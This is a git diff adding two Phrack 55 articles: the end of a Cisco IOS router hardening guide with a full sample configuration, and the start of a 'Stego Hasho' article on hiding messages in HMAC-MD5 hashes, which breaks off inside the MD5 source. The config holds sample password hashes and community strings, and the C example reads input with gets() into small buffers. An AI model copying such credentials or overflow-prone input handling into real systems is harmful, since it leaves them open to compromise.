+impossible.  The NTP protocol and the Cisco NTP implementation support
+cryptographic authentication using MD5 (DES is also supported by the protocol
+as the authentication hash but MD5 doesn't suffer from US export bogosity).
+This allows the NTP client to authenticate its time sources, and should
+prevent attackers from spoofing NTP servers and playing with the system
+clock.  If your budget can handle it, consider a network-based GPS stratum
+1 NTP time server that supports MD5 authentication.  Below we configure
+NTP to allow updates only from our internal time servers and authenticate
+the messages using MD5 for the message authentication code (MAC).
+
+  ! Setup our clock environment
+  clock timezone PST -8
+  clock summer-time zone recurring
+  ! Configure NTP
+  ntp authenticate
+  ntp authentication-key 1 md5 ntpk3y
+  ntp trusted-key 1
+  ntp access-group peer 20
+  ntp server ntp_server1_ip key 1 prefer
+  ntp server ntp_server2_ip key 1
+  !
+  ! Allow selected ntp hosts
+  access-list 20 permit host ntp_server1_ip
+  access-list 20 permit host ntp_server2_ip
+  access-list 20 deny any
+
+Syslog setup
+------------
+ 
+In this case, we will send syslog messages to two hosts and stamp the messages
+with the local date and time:
+
+  ! Send syslog messages to the mgmt host and log with localtime
+  service timestamps log datetime localtime
+  logging syslog1_ip
+  logging syslog2_ip
+
+By default, the router will send syslog messages with a local7 facility.
+If you want to store router messages in a separate file, your syslog.conf
+should include the line:
+
+  # router messages
+  local7.*                                 /var/adm/router.log
+
+The exact syntax and log file location may vary depending upon the syslogd you
+are using.
+   
+You can change the facility using:
+   
+  logging facility facility-type
+
+----[  Step 7 : Other protection mechanisms
+
+no ip source-route
+------------------
+
+Some attacks use the IP source route option.  The attacks rely on the ability
+of the attacker to specify the path a packet will take.  An attacker can send
+a source routed packet to a victim host behind the router which will then
+send back packets along the same path.  This allows replies to spoofed packets
+to return to the attacker.  Many modern operating systems allow you to drop IP
+packets with source route options set.  However, it is a good idea to drop
+these packets at the edge using the "no ip source-route" option.
+  
+Limiting ICMP
+-------------
+ 
+Several DoS attacks use the ICMP protocol.  It is a good idea to limit what
+types of ICMP messages are allowed.  At a minimum, in order to allow for Path
+MTU discovery (PMTU), you should consider permitting packet-too-big messages.
+The other types of ICMP messages allowed will depend upon the local security
+policy.
+   
+  ip access-list extended e1-in
+  ! Allow fragmentation needed messages (type 3 code 4)
+   permit icmp any 192.168.0.0 0.0.255.255 packet-too-big
+  ! Allow outbound ping and MS style traceroute (type 0)
+   permit icmp any 192.168.0.0 0.0.255.255 echo-reply
+  ! Uncomment to allow ping to the inside net (type 8)
+  ! permit icmp any 192.168.0.0 0.0.255.255 echo
+  ! Uncomment to allow traceroute
+  ! permit icmp any 192.168.0.0 0.0.255.255 ttl-exceeded
+
+Disable unnecessary services
+----------------------------
+ 
+Next we can disable unnecessary services.  By default, IOS has some services
+enabled which will allow attackers to gain information and perform Denial of
+Service attacks (though see above for issues with changing defaults in newer
+IOS versions and determining what is really enabled).
+   
+We will disable these:
+   
+  no service udp-small-servers
+  no service tcp-small-servers
+  no service finger
+  no ip bootp server
+  ! not enabled by default but be paranoid
+  no ip http server
+
+no cdp run
+----------
+
+Cisco Discovery Protocol (CDP) is a media independent protocol which, by
+default, runs on all Cisco equipment. The protocol is used for network
+management and to discover other Cisco devices.  The Cisco documentation says:
+
+   "CDP allows network management applications to discover Cisco
+   devices that are neighbors of already known devices, in particular,
+   neighbors running lower-layer, transparent protocols."
+   
+To turn CDP off on a specific interface, you can use:
+
+     interface Ethernet1
+      no cdp enable
+
+To disable CDP on all interfaces, you can use the global command:
+
+     no cdp run
+
+no ip unreachables
+------------------
+ 
+By default, when an access list drops a packet, the router returns a type 3,
+code 13 ICMP (administratively prohibited) message.  This allows potential
+attackers to know that the router implements access list filters. Also, most
+UDP scans rely on the target sending back unreachable messages.  To thwart
+UDP scans we can prevent the router from sending any ICMP type 3 (unreachable)
+messages by specifying the following on each interface:
+
+  no ip unreachables
+
+no ip proxy-arp
+---------------
+
+By default, IOS enables proxy ARP on all interfaces.  Since we don't need
+the service, we will disable it:
+
+  interface Ethernet0
+   no ip proxy-arp
+  interface Ethernet1
+   no ip proxy-arp
+
+no ip redirects
+---------------
+
+In cases where we have no need to send redirects, we will disable them:
+
+  interface Ethernet0
+   no ip redirects
+  interface Ethernet1
+   no ip redirects
+
+----[  Step 8 : Anti-spoofing
+
+The idea behind anti-spoofing is that nobody from the outside network should
+be sending packets to you with a source address of either your inside network
+address, or certain well-known and reserved addresses. We will use access
+lists to drop and log any of these packets.  A recent Internet draft is
+available (draft-manning-dsua-00.txt) which discusses the reserved netblocks
+that should be blocked at the edge.
+
+  ip access-list extended e1-in
+  ! Anti-spoofing: no packets with a src address = our inside net
+  ! Normally, this would not be a RFC 1918 net
+   deny ip 192.168.0.0 0.0.255.255 any log
+  !
+  ! Deny first octet zeros, all ones, and loopback network
+   deny ip 0.0.0.0 0.255.255.255 any log
+   deny ip host 255.255.255.255 any log
+   deny ip 127.0.0.0 0.255.255.255 any log
+  !
+  ! Deny class D (multicast) and class E (reserved for future use)
+   deny ip 224.0.0.0 15.255.255.255 any log
+   deny ip 240.0.0.0 7.255.255.255 any log
+  !
+  ! Deny RFC 1918 addresses
+   deny ip 10.0.0.0 0.255.255.255 any log
+   deny ip 172.16.0.0 0.15.255.255 any log
+  ! included above in this example
+  ! deny ip 192.168.0.0 0.0.255.255 any log
+  !
+  ! Deny test-net
+   deny ip 192.0.2.0 0.0.0.255 any log
+  !
+  ! Deny end node autoconfig 
+   deny ip 169.254.0.0 0.0.255.255 any log
+
+What you really want is a switch that will drop packets arriving on an
+interface with a source address that is not routed out that interface.  Some
+IOS releases have the ability to do this by using something called Cisco
+Express Forwarding (CEF) in conjunction with the "ip verify unicast
+reverse-path" interface command.  This requires strictly symmetric routing
+patterns and a 7500 Series (any 7000 with IOS 11.3) or a 12000 Gigabit switch
+router to run CEF.
+
+
+----[  Step 9 : Mitigating Denial of Service attacks
+ 
+There have been a rash of new Denial of Service (DoS) attacks over the past
+few years.  We can use access lists and other mechanisms to prevent or at
+least increase our ability to withstand some common DoS attacks.
+   
+SYN Floods
+----------
+ 
+A SYN flood occurs when an attacker sends a TCP SYN segment with an
+unreachable spoofed source address to an open port on the target.  The victim
+responds with a SYN,ACK to the unreachable host and the TCP handshake never
+completes. The victim's connection queue quickly gets filled with half-open
+connections in the SYN_RCVD state.  At some point, the server TCP will start
+to drop new SYNs.
+   
+SYN floods are discussed in the Cisco publication "Defining Strategies to
+Protect Against TCP SYN Denial of Service Attacks" [4].  Cisco IOS has a
+mechanism called TCP Intercept [5] which can be used to help protect against
+SYN floods.  TCP Intercept was introduced in IOS 11.3 and requires a specific
+feature set; it's in the Enterprise feature set and we hear some service
+provider feature sets and maybe others.
+   
+We have found that TCP Intercept works well in practice (protecting against
+real SYN floods); however, configuring it can be very confusing and the
+specifics will vary depending on a number of factors.  We recommend reading
+the Cisco documentation and if you are susceptible to SYN floods you may
+consider implementing TCP Intercept to mitigate the effects.
+   
+Land attack
+-----------
+ 
+The land program sends a packet to the victim with identical source and
+destination port, and identical IP addresses. This causes many network devices
+with to panic, including Unix hosts, Windows hosts,  routers, etc.
+
+We recommend that you run one of the newer IOS releases which contains fixes
+for this defect. A Cisco field notice provides details on which IOS versions
+are vulnerable. [6] If you can't update to a newer IOS, the field notice
+also contains information on how to configure access lists for protection.
+
+Stop malicious insiders (Ingress Filtering)
+-------------------------------------------
+ 
+If the inside network has untrusted hosts or users, you might want to use
+Ingress Filtering [7].  By denying packets with spoofed source addresses,
+Ingress Filtering prevents malicious inside users from launching some
+Denial of Service attacks.
+   
+In our case, this would be achieved by allowing the valid inside
+addresses out and then denying all others:
+
+  ! Ingress filter: only allow our net outbound
+  ip access-list extended e0-in   
+   permit ip 192.168.0.0 0.0.255.255 any
+   deny ip any any log
+  !
+  ! apply to inbound packets on the inside interface
+  interface Ethernet0
+   ip access-group e0-in in
+
+Smurf attacks
+-------------
+ 
+Smurf attacks continue to plague the Internet. If you don't take appropriate
+steps, you can be either a victim or an amplifier in a Smurf attack.  Craig
+Huegen has written a paper that details Smurf attacks and defenses [8].
+   
+To prevent your network from being used as a smurf amplifier, you need
+to filter packets sent to the broadcast address of your network.
+   
+  interface Ethernet0
+   no ip directed-broadcast
+
+  interface Ethernet1
+   no ip directed-broadcast
+
+
+----[  Step 10 : Protect hosts behind the router
+
+The router can also provide additional protection to any hosts behind it.
+This may include bastion hosts running web, FTP, mail, and DNS servers.  As an
+example, we will implement access lists to screen access to an HTTP server
+host (192.168.0.5). We think it is generally a good idea to filter both
+inbound and outbound packets (using inbound "in" access lists of each
+interface--we rarely come across cases where we use outbound "out" access
+lists).
+
+  ip access-list extended e1-in
+  ! allow tcp/80 to the web server
+   permit tcp any host 192.168.0.5 eq www
+  !
+  interface Ethernet1
+   ip access-group e1-in in
+
+  ip access-list extended e0-in
+  ! allow established connections from the web server
+   permit tcp host 192.168.0.5 eq www any established
+  !
+  interface Ethernet0
+   ip access-group e0-in in
+
+Note that this will not protect against command channel attacks directed at
+the permitted services.
+
+
+----[  Step 11 : Verify the configuration
+
+As mentioned earlier, depending upon the IOS version, a "sh running-config"
+might not display whether TCP and UDP small-servers are enabled.  You should,
+at a minimum, run a port scan against the router to verify the basic
+configuration. Note that if you have disabled IP unreachables, you will have
+to temporarily re-enable them to perform a UDP scan.
+
+You can use Fyodor's nmap program [9] to perform the scans.
+
+TCP scan
+--------
+
+[root@fuel src]# nmap -sT 192.168.0.1 -p 1-65535
+
+Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
+Interesting ports on  (192.168.0.1):
+Port    State       Protocol  Service
+23      open        tcp        telnet          
+
+If you do not allow VTY access, there shouldn't be any ports open.  In this
+case, we are allowing TELNET access from the same host that performed the scan.
+
+UDP scan
+--------
+
+[root@fuel config]# nmap -sU 192.168.0.1
+WARNING:  -sU is now UDP scan -- for TCP FIN scan use -sF
+
+Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
+Interesting ports on  (192.168.0.1):
+Port    State       Protocol  Service
+123     open        udp        ntp             
+161     open        udp        snmp            
+387     open        udp        aurp            
+611     open        udp        npmp-gui        
+727     open        udp        unknown         
+910     open        udp        unknown         
+   
+Note: We have seen false positives when using nmap for router UDP scans.  It
+can be a good approach to use multiple scanners for these tests.  Below we
+point udp_scan from SATAN at the router.  In this case, it turns out that
+611/udp and 727/udp are not really open:
+
+[root@fuel bin]# ./udp_scan 192.168.0.1 1-1024
+123:ntp:
+161:snmp:
+387:UNKNOWN:
+910:UNKNOWN:
+
+Also, we have noticed that IOS versions 11.2 and 11.3 have 387/udp and 910/udp
+open.  If someone at Cisco could explain this, we sure would like to hear it.
+We don't have Appletalk enabled so that doesn't explain the udp/387.  We
+tested IOS 12.0 with the exact same configuration and they are not open.
+
+
+----[ Thanks to...
+
+Thanks to everybody who reviewed the paper and provided valuable
+feedback. You know who you are.
+
+
+----[  References
+  
+General References
+------------------
+ 
+Increasing Security on IP Networks is at
+http://www.cisco.com/univercd/cc/td/doc/cisintwk/ics/cs003.htm
+   
+Cisco Internet Security Advisories can be found at
+http://www.cisco.com/warp/public/707/advisory.html
+
+Specific References
+-------------------
+
+[0] Marcus J. Ranum, "Thinking About Firewalls V2.0: Beyond
+    Perimeter Security"
+    http://www.clark.net/pub/mjr/pubs/think/index.htm
+ 
+[1] Decoding type 7 passwords
+    http://geek-girl.com/bugtraq/1997_4/0156.html
+
+[2] Password Recovery Techniques
+    http://www.cisco.com/warp/public/701/22.html
+
+[3] CIAC bulletin on login banners
+    http://ciac.llnl.gov/ciac/bulletins/j-043.shtml
+          
+[4] "Defining Strategies to Protect Against TCP SYN Denial of
+    Service Attacks"
+    http://www.cisco.com/warp/public/707/4.html
+          
+[5] Information on TCP Intercept
+    http://www.cisco.com/univercd/cc/td/doc/product/software/ios113ed/
+    113ed_cr/secur_c/scprt3/scdenial.htm
+          
+[6] Information on land attacks
+    http://www.cisco.com/warp/public/770/land-pub.shtml
+          
+[7] RFC 2267: Network Ingress Filtering: Defeating Denial of
+    Service Attacks by P. Ferguson and D. Senie
+    ftp://ftp.isi.edu/in-notes/rfc2267.txt
+          
+[8] Craig Huegen's paper
+    http://users.quadrunner.com/chuegen/smurf.cgi
+       
+    Cisco has a paper Minimizing the Effects of "Smurfing" Denial
+    of Service (DOS) Attacks
+    http://www.cisco.com/warp/public/707/5.html
+
+[9] Fyodor's nmap
+    http://www.insecure.org/nmap/
+
+
+----[  Appendix A
+
+The complete router configuration is given below.
+
+<++> P55/Bastion-router/cisco-conf.txt !75510e67
+! We have replaced the mnemonic names with the following addresses:
+!
+! ntp_server1_ip: 192.168.1.100
+! ntp_server2_ip: 192.168.1.101
+! syslog1_ip: 192.168.1.102
+! syslog1_ip: 192.168.1.103
+! mgmt_ip: 192.168.1.104
+! snmp_mgmt_ip: 192.168.1.105
+!
+version 11.3
+service timestamps debug uptime
+service timestamps log datetime localtime
+!
+! protect passwords
+service password-encryption
+enable secret 5 $1$k2gM$4W2tuuTUqxuRd.LQxsh/v.
+!
+username variablek password 7 110F0B0012
+username brett password 7 15190E1A0D24
+ip subnet-zero
+!
+hostname reeb
+!
+interface Ethernet0
+ description Inside Interface
+ ip address 192.168.0.1 255.255.0.0
+ ip access-group e0-in in
+ no ip directed-broadcast
+ no ip unreachables
+ no ip proxy-arp
+ no ip redirects
+!
+interface Ethernet1
+ description Outside Interface
+ ip address 172.16.1.1 255.255.255.252
+ ip access-group e1-in in
+ no ip directed-broadcast
+ no ip unreachables
+ no ip proxy-arp
+ no ip redirects
+!
+! turn off unnecessary services
+no ip bootp server
+! the http server is disabled by default. but be paranoid.
+no ip http server
+no service tcp-small-servers
+no service udp-small-servers
+no service finger
+no cdp run
+!
+! disable source routed packets
+no ip source-route
+!
+! setup the clock
+clock timezone PST -8
+clock summer-time zone recurring
+! setup NTP
+ntp authenticate
+ntp authentication-key 1 md5 151C1F1C0F7932 7
+ntp trusted-key 1
+ntp access-group peer 20
+ntp server 192.168.1.100 key 1 prefer
+ntp server 192.168.1.101 key 1
+!
+! configure logging
+service timestamps log datetime localtime
+logging buffered 4096 informational
+logging console informational
+logging 192.168.1.102
+logging 192.168.1.103
+!
+! configure SNMP
+! allow SNMP reads from hosts in access-list 10
+snmp-server community h4rd2gu3ss ro 10
+! send traps with community names
+snmp-server trap-authentication
+! send all traps to the management host on the inside interface
+snmp-server trap-source Ethernet0
+snmp-server host 192.168.1.105 h4rd2gu3ss
+!
+! simple static routing. default to the ISP
+ip route 0.0.0.0 0.0.0.0 172.16.1.2 
+ip route 192.168.0.0 255.255.0.0 192.168.0.2
+!
+! standard ip access-lists
+!
+! allowed hosts for SNMP reads
+no access-list 10
+access-list 10 permit host 192.168.1.105
+access-list 10 deny any
+!
+! ntp hosts
+no access-list 20
+access-list 20 permit host 192.168.1.100
+access-list 20 permit host 192.168.1.101
+access-list 20 deny any
+!
+! hosts allowed to telnet to the router
+no access-list 99
+access-list 99 permit host 192.168.1.104
+access-list 99 deny any
+!
+! extended ip access-lists
+!
+no ip access-list extended e1-in
+ip access-list extended e1-in
+! Anti-spoofing
+! Deny packets on outside with src address = our inside nets
+! This normally wouldn't be a RFC 1918 network
+ deny ip 192.168.0.0 0.0.255.255 any log
+!
+! Deny first octet zeros, all ones, and loopback
+ deny ip 0.0.0.0 0.255.255.255 any log
+ deny ip host 255.255.255.255 any log
+ deny ip 127.0.0.0 0.255.255.255 any log
+!
+! Deny class D (multicast) and class E (reserved for future use)
+ deny ip 224.0.0.0 15.255.255.255 any log
+ deny ip 240.0.0.0 7.255.255.255 any log
+!
+! Deny RFC 1918 addresses
+ deny ip 10.0.0.0 0.255.255.255 any log
+ deny ip 172.16.0.0 0.15.255.255 any log
+! included above in this example
+! deny ip 192.168.0.0 0.0.255.255 any log
+!
+! Deny test-net
+ deny ip 192.0.2.0 0.0.0.255 any log
+! Deny end node autoconfig 
+ deny ip 169.254.0.0 0.0.255.255 any log
+!
+! ICMP allows
+! Allow fragmentation needed messages (type 3 code 4)
+ permit icmp any 192.168.0.0 0.0.255.255 packet-too-big
+! Allow outbound ping and MS style traceroute (type 0)
+ permit icmp any 192.168.0.0 0.0.255.255 echo-reply
+! Uncomment to allow ping to the inside net (type 8)
+! permit icmp any 192.168.0.0 0.0.255.255 echo
+! Uncomment to allow traceroute
+! permit icmp any 192.168.0.0 0.0.255.255  ttl-exceeded
+!
+! permit certain connections
+! example: permit connections from the outside to a web server
+ permit tcp any host 192.168.0.5 eq 80
+!
+! explicit default deny
+ deny ip any any log
+!
+no ip access-list extended e0-in
+ip access-list extended e0-in
+!
+! our policy is only allow replies from the inside web server,
+! some ICMP and specific inside hosts to access the router.
+!
+! permit certain connections
+! example: allow responses from the web server
+ permit tcp host 192.168.0.5 eq www any established
+!
+! allow connections from ntp, mgmt, etc. to the router
+ permit udp host 192.168.1.105 host 192.168.0.1 eq snmp
+ permit udp host 192.168.1.100 host 192.168.0.1 eq ntp
+ permit udp host 192.168.1.101 host 192.168.0.1 eq ntp
+ permit tcp host 192.168.1.104 host 192.168.0.1 eq telnet
+!
+! allow specific ICMP out
+ permit icmp 192.168.0.0 0.0.255.255  any packet-too-big
+ permit icmp 192.168.0.0 0.0.255.255 any echo
+! Uncomment to allow inbound ping responses
+! permit icmp 192.168.0.0 0.0.255.255 any echo-reply
+! Uncomment to allow traceroute
+! permit icmp 192.168.0.0 0.0.255.255 any ttl-exceeded
+!
+! Ingress filtering: uncomment to deny connections to router and 
+! then allow outbound if source address = our net. In this case, 
+! we don't allow any traffic out and go directly to explicit deny.
+! deny ip any host 192.168.0.1 log
+! permit ip 192.168.0.0 0.0.255.255 any 
+!
+! explicit deny
+ deny ip any any log
+!
+!
+line con 0
+ login local
+! logout idle console access after two min
+ exec-timeout 2 0
+line aux 0
+! Uncomment below to disable logins on the AUX port
+! no exec
+! Or allow password access
+ login local
+line vty 0 4
+! uncomment to disable telnet listener
+! transport input none
+ access-class 99 in
+ login local
+end
+
+$Id: bastion-ios.txt,v 1.26 1999/06/24 17:06:21 beldridg Exp $
+<-->
+
+----[  EOF
diff --git a/phrack55/11.txt b/phrack55/11.txt
new file mode 100644
index 0000000..1705618
--- /dev/null
+++ b/phrack55/11.txt
@@ -0,0 +1,989 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 11 of 19  ]
+
+
+-------------------------[  Stego Hasho  ]
+
+
+--------[  Conehead  ]
+
+
+----[  Introduction
+
+
+The use of hash (checksum) functions in a design for encryption/decryption
+systems is not export controlled by the U.S. government.  But even if hash
+functions aren't allowed to be exported for confidentiality purposes at some
+point in the future, there will still be a hidden way of accomplishing privacy
+in their approved, exportable forms (unless the export of MACs also becomes
+controlled).
+
+
+----[  Integrity
+
+The common use for a hash function (basically a one-way encryptor as opposed
+to a two-way such as DES or RSA, taking a variable sized message and reducing
+it to a set number of random bits) is to assure the integrity of a message
+from sender to receiver (or anyone else for that matter).  The message and
+its sender computed hash are sent across the network where the receiver
+compares the received hash with the receiver computed hash using the shared
+hash function against the received message.  If there's no match in the hashes,
+he/she can assume the message is faulty.
+
+1: H(message)---message,hash--->H(message)
+
+
+----[  Authentication
+
+While this provides for message integrity, it doesn't provide message
+authentication.  Authentication of a message through a hash(generally only
+between the sender and receiver) can be provided with the addition of a shared
+secret key between the sender and receiver (possibly exchanged via
+Diffie-Hellman) to the message (PGP accomplishes hash authentication through a
+public key, usually allowing anyone to authenticate it).  The message (without
+the key) and its sender computed hash (using the key) are sent across a wire
+where the receiver compares the received hash with the receiver computed hash
+using the shared hash function against the received message and the shared key.
+This method still allows for deniability among keyholders.  With
+authentication, use of a nonce in the hash should also be considered to avoid
+a replay attack.  Obviously, anyone only using the hash function against the
+message to produce this hash will find no match.  He/she may then assume its a
+MAC (message authentication code). If there's no match in the hashes, the
+receiver might not know whether the integrity and/or authentication is to
+blame.
+
+2: H(message+key)---message,hash--->H(message+key)
+
+A mandatory construction of protocol 2 for internet security protocols is
+Bellare's HMAC.
+
+3: H(key XOR opad,H(key XOR ipad,message))
+
+
+----[  Confidentiality
+
+While a hash MAC provides for message integrity and authentication, there is no
+confidentiality to the message using this method.  However, a form of message
+confidentiality using hashes can be achieved with the addition of a few simple
+steps.  In addition to the message and key, the sender will also add a secret
+message to be hashed.  The message (without the key and secret message) and its
+sender computed hash (using the key and secret message) are sent across a wire
+where the receiver compares the received hash with the receiver computed hash
+using the shared hash function against the received message, shared key, and
+secret message.  A receiver may first wish to check if the hash is a MAC, then
+look for a secret message.  If there's no match in the hashes, he/she might not
+know whether the integrity, authentication, and/or failure to determine the
+secret is to blame.
+
+4: H(public message+key+secret message)---public message,hash--->H(public
+   message+key+secret message)
+
+For HMAC, the secret message can be appended to the public message.
+
+5: H(key XOR opad,H(key XOR ipad,public message+secret message))
+
+The obvious question for the receiver is how to choose the right secret message
+to get the hash to compute correctly.  The answer is to use a brute force
+method using a dictionary of possible secret messages, a method similar to
+those of password cracking programs with the public message used as the salt.
+While this may sound unfeasible at first, the choice of a "secret message"
+dictionary with a reasonable search space (its granularity via letters, words,
+and/or phrases), the orderliness of the dictionary(sorted by most commonly
+used to least), a decent hash speed (the size of the secret message is not a
+factor), and/or performing the hash computations in parallel can simplify
+brute forcing into a workable solution. In addition to figuring out the secret
+message, integrity and authentication of both the public and secret messages
+will also be guaranteed.
+
+
+----[  Steganography
+
+By now, it should be obvious from what is sent over the wire in protocols 2 and
+4 that hash confidentiality also has a steganographic (hidden) property.
+Hashes used as one-time pads or in wheat/chaff operations for confidentiality
+don't possess this property.  In a variation on this method, another stego
+version of this would be to take out the public message.  Some applications
+such as S/key only send hashes over the wire at certain points in their
+protocols.
+
+6: H(key+secret message)---hash--->H(key+secret message)
+
+The strength of the encryption method lies in the strength of the underlying
+MAC (hash function, key length, key reuse, and construction).  The strength of
+the steganographic method lies in giving the impression that only a MAC is
+being used: minimizing public message reuse, keeping others ignorant of the
+stego hasho construction formula, and using the most conservative number of
+stego hashes to convey a large message(this relates to dictionary granularity).
+If secret messages need to be tied together in sequential order to form a
+larger message, using a nonce such as a timestamp in each message for
+sequencing will suffice (or adopting an external sequence number such as is
+found in network packets).  The stego property can still be maintained because
+MACs use nonces.  Examples where a larger message could be sent without much
+suspicion could involve a stream of authenticated IPv6 packets or the transfer
+of a list of files and their corresponding checksums.  As far as cryptanalysis,
+steganalysis, and other attacks are concerned, strong hash function and
+construction is important. Also, frequent changes in the public message and
+secret key help.  If a particular hash or construction flaw causes the
+encryption to be broken, change to a more secure one. However, old secret
+messages may be compromised.
+
+It's kind of ironic that this is a stego method based on embedding a secret
+into ciphertext (hash), based on a misguided notion as to the ciphertext's
+function.  Other stego methods(such as using image bits) are weaker and may
+involve more overhead, though they may be strengthened by encrypting the
+embedded secret.
+
+Example of stego hasho with HMAC construction (source available from RFC2104)
+using MD5 hash (source available from RFC1321) and on-line English dictionary
+(source available from your local cracker).
+
+
+----[  The Code
+
+<++> P55/Stego-hasho/example.c !55654cc3
+/*stego hasho exampleo */
+#include <time.h>
+#include <stdio.h>
+#include <string.h>
+
+int
+main ()
+{
+  char shared_secret_key[8];
+  char dictionary_word[20];
+  char message[100];
+  char public_message[50];
+  time_t timestamp_nonce;
+  char secret_message[20];
+  unsigned char sender_sent_digest[16],receiver_computed_digest[16];
+  int i;
+
+  FILE *inFile = fopen ("english.dictionary", "r");
+  printf ("HMAC-MD5 Stego Hasho\n");
+  printf ("Sender-\n");
+  printf ("Input shared secret key:");
+  gets(shared_secret_key);
+  printf ("Input public message:");
+  gets(public_message);
+  time (&timestamp_nonce);
+  printf ("Input secret message:");
+  gets(secret_message);
+  printf ("Creating hash\n");
+  sprintf(message,"%s%d",public_message,timestamp_nonce);
+  strcat(message,secret_message);
+  hmac_md5(message, strlen(message), shared_secret_key,
+           strlen(shared_secret_key), sender_sent_digest);
+  printf ("Sent across wire from sender to receiver-\nmessage:%s%d hash:",
+          public_message,timestamp_nonce);
+  for (i = 0; i < 16; i++)
+    printf ("%02x", sender_sent_digest[i]);
+  printf ("\nReceiver-\n");
+  printf ("See if only MAC\n");
+  sprintf(message,"%s%d",public_message,timestamp_nonce);
+  hmac_md5(message, strlen(message), shared_secret_key,
+           strlen(shared_secret_key), receiver_computed_digest);
+  printf ("MAC hash:");
+  for (i = 0; i < 16; i++)
+    printf ("%02x",receiver_computed_digest[i]);
+  if (bcmp(sender_sent_digest,receiver_computed_digest,16) != 0)
+    printf ("\nNot a MAC!\n");
+  else {
+    printf ("\nIt's a MAC!\n");
+    fclose(inFile);
+    exit(0);
+  }    
+  printf ("Finding secret message\n");
+  while (fscanf(inFile,"%s",dictionary_word) != EOF) {
+    sprintf(message,"%s%d",public_message,timestamp_nonce);
+    strcat(message,dictionary_word);
+    hmac_md5(message, strlen(message), shared_secret_key,
+             strlen(shared_secret_key), receiver_computed_digest);
+    if (bcmp(sender_sent_digest,receiver_computed_digest,16) == 0) {
+      printf ("Dictionary word hash:");
+      for (i = 0; i < 16; i++)
+        printf ("%02x", receiver_computed_digest[i]);
+      printf ("\nThe secret message is %s!\n",dictionary_word);
+      break;
+    }
+  }
+  if (bcmp(sender_sent_digest,receiver_computed_digest,16) != 0)
+    printf ("The secret message was not found!\n");
+  fclose(inFile);
+}
+<-->
+
+Sample Run:
+HMAC-MD5 Stego Hasho
+Sender-
+Input shared secret key:test
+Input public message:this is a test
+Input secret message:omega
+Creating hash
+Sent across wire from sender to receiver-
+message:this is a test915085524 hash:9b7ba39ec743b0eaaccbc08aaa51565b
+Receiver-
+See if only MAC
+MAC hash:324d28bc83e881782914b32812c97152
+Not a MAC!
+Finding secret message
+Dictionary word hash:9b7ba39ec743b0eaaccbc08aaa51565b
+The secret message is omega!
+
+
+Source Code (successfully compiled in SunOS environment)
+-------------------------------------------------------
+Makefile
+--------
+<++> P55/Stego-hasho/Makefile !681efd3d
+CC   =  cc
+
+md5driver: md5driver.o hmac.o md5.o
+	$(CC) -o md5driver md5driver.o hmac.o md5.o
+
+example: hmac.o example.o md5driver.o md5.o
+	$(CC) -o example hmac.o md5driver.o md5.o
+<-->
+
+md5.h
+-----
+<++> P55/Stego-hasho/md5.h !e95d4a1b
+#include <memory.h>
+
+/*
+ ***********************************************************************
+ ** md5.h -- header file for implementation of MD5                    **
+ ** RSA Data Security, Inc. MD5 Message-Digest Algorithm              **
+ ** Created: 2/17/90 RLR                                              **
+ ** Revised: 12/27/90 SRD,AJ,BSK,JT Reference C version               **
+ ** Revised (for MD5): RLR 4/27/91                                    **
+ **   -- G modified to have y&~z instead of y&z                       **
+ **   -- FF, GG, HH modified to add in last register done             **
+ **   -- Access pattern: round 2 works mod 5, round 3 works mod 3     **
+ **   -- distinct additive constant for each step                     **
+ **   -- round 4 added, working mod 7                                 **
+ ***********************************************************************
+ */
+
+/*
+ ***********************************************************************
+ ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved.  **
+ **                                                                   **
+ ** License to copy and use this software is granted provided that    **
+ ** it is identified as the "RSA Data Security, Inc. MD5 Message-     **
+ ** Digest Algorithm" in all material mentioning or referencing this  **
+ ** software or this function.                                        **
+ **                                                                   **
+ ** License is also granted to make and use derivative works          **
+ ** provided that such works are identified as "derived from the RSA  **
+ ** Data Security, Inc. MD5 Message-Digest Algorithm" in all          **
+ ** material mentioning or referencing the derived work.              **
+ **                                                                   **
+ ** RSA Data Security, Inc. makes no representations concerning       **
+ ** either the merchantability of this software or the suitability    **
+ ** of this software for any particular purpose.  It is provided "as  **
+ ** is" without express or implied warranty of any kind.              **
+ **                                                                   **
+ ** These notices must be retained in any copies of any part of this  **
+ ** documentation and/or software.                                    **
+ ***********************************************************************
+ */
+
+/*#define bcopy(x,y,n) memmove(y,x,n)
+#define bzero(x,y) memset(x,0,y)
+#define bcmp(x,y,n) memcmp(x,y,n)*/
+
+/* typedef a 32-bit type */
+typedef unsigned long int UINT4;
+
+/* Data structure for MD5 (Message-Digest) computation */
+typedef struct {
+  UINT4 i[2];                   /* number of _bits_ handled mod 2^64 */
+  UINT4 buf[4];                                    /* scratch buffer */
+  unsigned char in[64];                              /* input buffer */
+  unsigned char digest[16];     /* actual digest after MD5Final call */
+} MD5_CTX;
+
+void MD5Init ();
+void MD5Update ();
+void MD5Final ();
+
+/*
+ ***********************************************************************
+ ** End of md5.h                                                      **
+ ******************************** (cut) ********************************
+ */
+<-->
+md5.c
+-----
+<++> P55/Stego-hasho/md5.c !bd76c633
+/*
+ ***********************************************************************
+ ** md5.c -- the source code for MD5 routines                         **
+ ** RSA Data Security, Inc. MD5 Message-Digest Algorithm              **
+ ** Created: 2/17/90 RLR                                              **
+ ** Revised: 1/91 SRD,AJ,BSK,JT Reference C ver., 7/10 constant corr. **
+ ** Revised: 6/99 Conehead                                            **
+ ***********************************************************************
+ */
+
+/*
+ ***********************************************************************
+ ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved.  **
+ **                                                                   **
+ ** License to copy and use this software is granted provided that    **
+ ** it is identified as the "RSA Data Security, Inc. MD5 Message-     **
+ ** Digest Algorithm" in all material mentioning or referencing this  **
+ ** software or this function.                                        **
+ **                                                                   **
+ ** License is also granted to make and use derivative works          **
+ ** provided that such works are identified as "derived from the RSA  **
+ ** Data Security, Inc. MD5 Message-Digest Algorithm" in all          **
+ ** material mentioning or referencing the derived work.              **
+ **                                                                   **
+ ** RSA Data Security, Inc. makes no representations concerning       **
+ ** either the merchantability of this software or the suitability    **
+ ** of this software for any particular purpose.  It is provided "as  **
+ ** is" without express or implied warranty of any kind.              **
+ **                                                                   **
+ ** These notices must be retained in any copies of any part of this  **
+ ** documentation and/or software.                                    **
+ ***********************************************************************
+ */
+
+#include "md5.h"
+
+/*
+ ***********************************************************************
+ **  Message-digest routines:                                         **
